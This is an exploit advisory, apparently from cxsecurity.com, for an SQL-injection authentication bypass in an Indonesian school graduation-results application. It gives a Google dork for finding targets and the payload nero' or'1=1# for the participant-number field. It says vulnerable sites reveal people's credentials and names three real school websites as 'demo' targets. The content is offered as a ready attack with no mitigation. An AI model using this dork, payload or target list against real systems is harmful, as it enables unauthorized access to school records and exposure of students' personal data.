Aplikasi Sistem Informasi Kelulusan - Bypass SQL Vulnerabilities

2020.09.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

+------------------------------------------------+ # Exploit Title: Aplikasi Sistem Informasi Kelulusan - Bypass SQL Vulnerabilities # Google Dork: inurl:/index.html intitle:Admin Tokol DistroIT # Date: 06/09/2020 # Author: Gh05t666nero # Team: Indoghostsec # Tested on: Linux #1 SMP Debian 5.7.6-1kali2 (2020-07-01) +------------------------------------------------+ [~] Search the dork in Google [~] Open target [~] Enter No Peserta with [~] No Peserta: nero' or'1=1# [~] If vulnerable you will see the credentials of a person or several people at once. +------------------------------------------------+ [~] Demo Site:- [~] http://www.smpkatolikadisucipto.sch.id/kabarlulus/ [~] http://smk1palembang.sch.id/kelulusanxyz-0a/ [~] http://smapgri1mjl.sch.id/kelulusan/ +------------------------------------------------+ Contact me:- cybernatic@indoghostsec.my.id

References:

Greet'z to all member Indoghostsec


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top